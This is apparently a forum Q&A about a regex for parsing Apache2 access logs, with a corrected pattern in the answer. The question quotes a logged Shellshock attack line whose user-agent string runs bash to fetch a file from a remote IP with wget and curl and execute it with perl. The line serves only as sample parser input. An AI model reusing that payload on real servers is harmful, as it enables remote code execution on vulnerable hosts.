Reputation: 138
I want to parse Apache2 log files and found an otherwise good regexp here to do so, using the regexp below:
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/
The problem is this regexp predates shellshock hack bots, and the string returns no match against a user agent string like sent below:
Bad example bash attack:
199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
Here is a regular log line:
157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
Can someone provide an updated regexp that handles hacked user agent string, or suggest an alternative two step php - regexp to be more hack proof? I can see the specific problem relates to handling \" and it appears the last regep can be replaced with "(.*)"$ but I'd like an expert opinion ... Thanks.
Upvotes: 0
Views: 499
Reputation: 241911
Change both instances of
"([^"]*)"
to
"((?:[^"]|\\")*)"
That will allow \" within quoted strings.
By the way, it is not necessary to backslash-escape quotes in a regex, nor is it necessary to backslash-escape ] in a character class when it is the first character in the class. So you could remove some redundant backslashes. And personally, I'd use the same quote exclusion syntax instead of a non-greedy match.
Finally, as is observed in a comment, the parse of the request will fail in the case that the request is incomplete. If the only incomplete request line is a missing indicator ("-"
), then you could recognize these by making most of the request optional, leaving the -
as the "method".
So I'd suggest the following:
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/
Upvotes: 0